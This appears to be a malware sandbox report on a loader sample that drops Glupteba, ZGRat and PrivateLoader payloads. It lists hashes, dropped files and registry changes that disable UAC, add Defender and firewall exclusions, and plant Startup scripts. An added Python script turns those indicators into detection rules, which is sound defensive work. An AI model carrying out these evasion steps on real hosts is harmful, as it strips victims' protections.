MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ff46b0a6ae88e75f6220ab981e3e0e8a
SHA1 61110724609ce2e68fc7fdb63a889e55b3d81ed1
SHA256 36bcc0113b6493f4a9eda8f8eac14437a120d310179f66a7ef2d25195dfd5ba4
SHA512 b1ddfc9a138f04ce549801fb1d4a8e21a8627786ca2117db3eed8f95c8306d9c17992d817f4caaf38eaa48db10688c98db158878e888d77635215fc54175257d

C:\Users\Admin\AppData\Local\Temp\Cab35A9.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe

MD5 8ff1083b2490429a4ea0ecf8f5542c8c
SHA1 70ebf9b87666aab4db253e98e845ea440602a4cc
SHA256 e43535ac108378521826695ae572ea24b4cde1a78b0016d3b5ebe82ff5934535
SHA512 c2f4d386f0b46ed9ed0716e3df086afb3ed360ea3afb74cb3dc0369311088332ae037269575722d5f60a12be9a242f505d32440ed294ad5170ec315c588b3c5c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bfa271adab7bfab7729be3a701604bcb
SHA1 fd5050423dd4eac8aa034ae9dca81a4e27b0a4bc
SHA256 2e1b42b7ce399a5418e642bff79e06a9a2e949e7c11f10a0aca310e2931e829e
SHA512 903e6221a3a81f9a57c4194c5e192f04867cfa626094a2de31c6d5cbd25a31d408446dc3af006bb227a7462b591a69e6d098cd27e3cb093efd426f23eb562724

C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe

MD5 d41fd1ea6e0ca0032be2174317f60fd8
SHA1 60f001b9d201259aa333e9b202e4ab5648d16bf3
SHA256 3c56d175e67df7e1664bbedd95abee57cf93a7aceaf80374ede4ce1fc4a30990
SHA512 a4ce799f1ce9157d053dcb1694dcb127d98e994eb55cecb484ace1c192cf80a1fbfb7b8de94851a49e915cafebc568f70ce07b912e5901387ed90639c692c16e

memory/2572-234-0x00000000099F0000-0x000000000A36B000-memory.dmp

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

MD5 b4edadf4b8fc4c176cef6830ab7d3177
SHA1 6f93a98295f5b4a514870db5c50d000f3d644264
SHA256 241ec7b24544cef6c5762622c25c91621f0dd20c9154dcf20c83932d2c3496e5
SHA512 dc727e1cbe252fdfbc866ac4dad3d256038535b32d437d8d17e537c8723b1b8f51da6e0de4a7ac53295cf091fcf93591907f1bd2487618c542bc96e8616232dc

memory/1824-250-0x0000000002FB0000-0x00000000033A8000-memory.dmp

memory/2204-253-0x0000000003150000-0x0000000003548000-memory.dmp

memory/856-252-0x0000000140000000-0x000000014097B000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

MD5 34e8369309638e9468c65df8d546e9ec
SHA1 f6296bdb66b9f188a9093d0f2e3edaf3dfd5ed9f
SHA256 bc09d4cc90b0e7b582c6ed7010277377aff00042d7469cb2e9f11f775cef4605
SHA512 b792981f6e855fcab23dbb078f5aa2398c6c4175b4b151a656174b756de936bc388d2fa2c8432a9b9120256e5db9ebbfca38a12d60bc085f744988ef1a726c48

memory/980-276-0x0000000003050000-0x0000000003448000-memory.dmp

memory/2484-284-0x0000000003440000-0x0000000003838000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u26o.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

memory/2192-308-0x0000000003170000-0x0000000003568000-memory.dmp

memory/1972-312-0x00000000032E0000-0x00000000036D8000-memory.dmp

memory/1964-313-0x00000000030E0000-0x00000000034D8000-memory.dmp

memory/2680-314-0x0000000003150000-0x0000000003548000-memory.dmp

memory/2140-316-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Users\Admin\AppData\Local\Temp\u26o.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2484-331-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2832-355-0x0000000000400000-0x0000000002B1E000-memory.dmp

memory/980-315-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1824-334-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2204-356-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2220-369-0x000007FEF5CA3000-0x000007FEF5CA4000-memory.dmp

memory/2192-401-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2276-402-0x0000000003070000-0x0000000003468000-memory.dmp

memory/1972-414-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2680-422-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1964-423-0x0000000000400000-0x0000000002ED5000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1538d8892608632e9aade661741772fb
SHA1 9b49faf2cb23c18015d1f617ec0b63b9b1f5add2
SHA256 4fa4e24553f12416e69aff86a4cd3bf4d278967660fd137bca9d4543ff939264
SHA512 5521170938be681b2eda9597de875d79936e39bb40744b3ad09b9bff1c00f8b4807d98f58bb4e3d7e70091415a712468001e3225554bcbb8807e360931f1383e

memory/856-444-0x0000000140000000-0x000000014097B000-memory.dmp

memory/2220-445-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2140-446-0x0000000000400000-0x0000000002AF1000-memory.dmp

memory/908-458-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

memory/2572-469-0x00000000099F0000-0x000000000A36B000-memory.dmp

memory/1916-470-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1916-484-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2276-486-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 b0536d63a073ee6a60e9000308a9d61c
SHA1 1353e69e21057cfcf276d11dbc6b314bac327ec8
SHA256 6d1bd49c759595543939da5dfd6d7c790cb6696eda23adb1f8d04b50b1edcd57
SHA512 0f3fcee992c589349d777baca2362a8ebb63bb97b6009ea292121fdd317ca9b438032eba37ae9b57358afa7aefecc32fb3f61fe907e0d7325cc072b0890049e7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a6188e5f5a0d79882e53f2944906cefe
SHA1 52991cc93010de70d126e86ecf55198b94753d8c
SHA256 a3868fc8f6842dc3772956b160e1b0d95cae507122548d2ca572c58ab067ddaa
SHA512 85761e5014acb8f3d7ee9c82f933f00beabc1b513353a3aa4652c823b5f9cb1eab5aceeb8833c510f0460bf80acb9e824d4628be0ce50a3343c4e5dbd670034e

memory/908-510-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1984-550-0x0000000000CD0000-0x0000000004504000-memory.dmp

memory/1984-551-0x000000001EC70000-0x000000001ED7A000-memory.dmp

memory/1984-553-0x0000000000CC0000-0x0000000000CCC000-memory.dmp

memory/1984-552-0x00000000005E0000-0x00000000005F0000-memory.dmp

memory/1984-554-0x0000000000CB0000-0x0000000000CC4000-memory.dmp

memory/1984-555-0x000000001DEF0000-0x000000001DF14000-memory.dmp

memory/1984-565-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-567-0x0000000000B00000-0x0000000000B0A000-memory.dmp

memory/1984-566-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-569-0x000000001F350000-0x000000001F402000-memory.dmp

memory/1984-568-0x000000001E4B0000-0x000000001E4DA000-memory.dmp

memory/1984-570-0x0000000000B10000-0x0000000000B1A000-memory.dmp

memory/1984-574-0x000000001FB40000-0x000000001FE40000-memory.dmp

memory/1984-576-0x0000000005960000-0x000000000596A000-memory.dmp

memory/1984-578-0x000000001F400000-0x000000001F462000-memory.dmp

memory/1984-579-0x000000001E930000-0x000000001E952000-memory.dmp

memory/1984-577-0x000000001E500000-0x000000001E50A000-memory.dmp

memory/1984-582-0x000000001E950000-0x000000001E95C000-memory.dmp

memory/1984-590-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-591-0x0000000140000000-0x000000014097B000-memory.dmp

memory/2276-589-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\252e99e709753c2ab04b66e213ab7d72cfdb494a7016e07d23bc17fe7cebab94\767515fedb084df6a70a6b87b7ef68a7.tmp

MD5 fb67c495e466208562de27817cba1991
SHA1 d922da25589139f1c4af90dbcbac5c820e017543
SHA256 e2cef965cbe53b68e11caaee6ad00e4862fa6cc6069cee5b1f5d1014ad02bc53
SHA512 90f2a174a49cb4e98e87b33b76f9557597d4036eec9794af811599b12f3047cc52d29d9f64b4ba47e49dee51ffc163061be581c74104a2f6c74a214d1ffebae8

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

memory/2276-623-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1184-632-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/648-633-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1184-635-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-636-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/648-638-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-640-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2276-643-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/648-650-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-651-0x0000000000400000-0x0000000002ED5000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 04:05

Reported

2024-05-10 04:07

Platform

win10v2004-20240426-en

Max time kernel

138s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

PrivateLoader

loader privateloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XSL75Dp8X5GvcCSscAgMff6t.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hCJWlBKjXo5Oob92l9foUS1J.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tLX6e4KApytTPZefSa8PPI7v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qqbWpY8aUPcYDuPjF1g7pqRG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ga59klDFaLgG33dY8jiOzth2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2X5ZHEh06YcWQbzIqdRD9re3.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xch3oM5lwdWLIvzlicgaJnAa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50SLWprzYHmxenwhmKGlIhTj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
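
The registry and file rows in this run (EnableLUA set to 0, a Defender path exclusion for the whole of C:\, a firewall rule written straight into FirewallPolicy\FirewallRules, and jsc.exe dropping .bat files into the Startup folder) are the ones that translate directly into host detections. The Python below is an added example, not part of the report or of any detection product: it runs four rules over a handful of events constructed from the rows above, reduced to a Sysmon-like shape. The explorer.exe event is a benign control added for the example; csc.exe and vbc.exe in LOLBIN_WRITERS are assumed siblings of jsc.exe, which is the only writer the report shows. Note also that the MuiCache tzres strings and the PowerShell SystemCertificates keys listed further down under "Modifies data under HKEY_USERS" are side effects of time-zone enumeration and of PowerShell startup; they attribute activity to a process but are not techniques worth a rule.

```python
from pathlib import PureWindowsPath

# Events constructed from the behavioral2 signature rows above, reduced to a
# Sysmon-like shape (type, image, target, value). The explorer.exe event is a
# benign control added here; it does not come from the report.
EVENTS = [
    {"type": "RegistrySet",
     "image": r"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe",
     "target": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "value": "0"},
    {"type": "RegistrySet",
     "image": r"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe",
     "target": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
               r"\C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe",
     "value": "0"},
    {"type": "RegistrySet",
     "image": r"C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe",
     "target": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:" "\\",
     "value": "1"},
    {"type": "RegistrySet",
     "image": r"C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe",
     "target": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters"
               r"\FirewallPolicy\FirewallRules\C:" "\\",
     "value": "1"},
    {"type": "FileCreate",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
               r"\XSL75Dp8X5GvcCSscAgMff6t.bat"},
    {"type": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\Admin\Desktop\notes.txt"},
]

# jsc.exe is the writer seen in the report; csc.exe and vbc.exe are assumed
# siblings (same .NET Framework directory, equally no reason to touch Startup).
LOLBIN_WRITERS = {"jsc.exe", "csc.exe", "vbc.exe"}


def rule_uac_disabled(e):
    if (e["type"] == "RegistrySet"
            and e["target"].lower().endswith("\\policies\\system\\enablelua")
            and e.get("value") == "0"):
        return "UAC disabled (EnableLUA=0); effective after the next restart"
    return None


def rule_defender_exclusion(e):
    # Only a value under Exclusions\Paths\ is an exclusion; creating the key is not.
    marker = "\\windows defender\\exclusions\\paths\\"
    lowered = e["target"].lower()
    if e["type"] != "RegistrySet" or marker not in lowered:
        return None
    excluded = e["target"][lowered.index(marker) + len(marker):]
    scope = "entire drive" if len(excluded) == 3 and excluded.endswith(":\\") else "path"
    return f"Defender exclusion added for {scope} {excluded}"


def rule_firewall_rule_written(e):
    marker = "\\firewallpolicy\\firewallrules\\"
    lowered = e["target"].lower()
    if e["type"] != "RegistrySet" or marker not in lowered:
        return None
    return "Firewall rule written directly to the registry: " + e["target"][lowered.index(marker) + len(marker):]


def rule_lolbin_startup_drop(e):
    if e["type"] != "FileCreate":
        return None
    image = PureWindowsPath(e["image"]).name.lower()
    if image in LOLBIN_WRITERS and "\\start menu\\programs\\startup\\" in e["target"].lower():
        return f"{image} wrote {PureWindowsPath(e['target']).name} to the Startup folder"
    return None


RULES = [rule_uac_disabled, rule_defender_exclusion, rule_firewall_rule_written,
         rule_lolbin_startup_drop]


def run_rules(events):
    """Return (finding, image basename) for every rule that matches an event."""
    findings = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                findings.append((hit, PureWindowsPath(e["image"]).name))
    return findings


if __name__ == "__main__":
    for finding, image in run_rules(EVENTS):
        print(f"{image}: {finding}")
```

The exclusion rule distinguishes a drive-root exclusion from a single-path one on purpose: excluding C:\ disables on-access scanning for the whole system drive, which is a far stronger signal than the self-exclusion of one dropped executable. The EnableLUA change needs a restart before UAC is actually off, so on a host where it is found the question is whether a reboot has happened since.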

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 716 set thread context of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
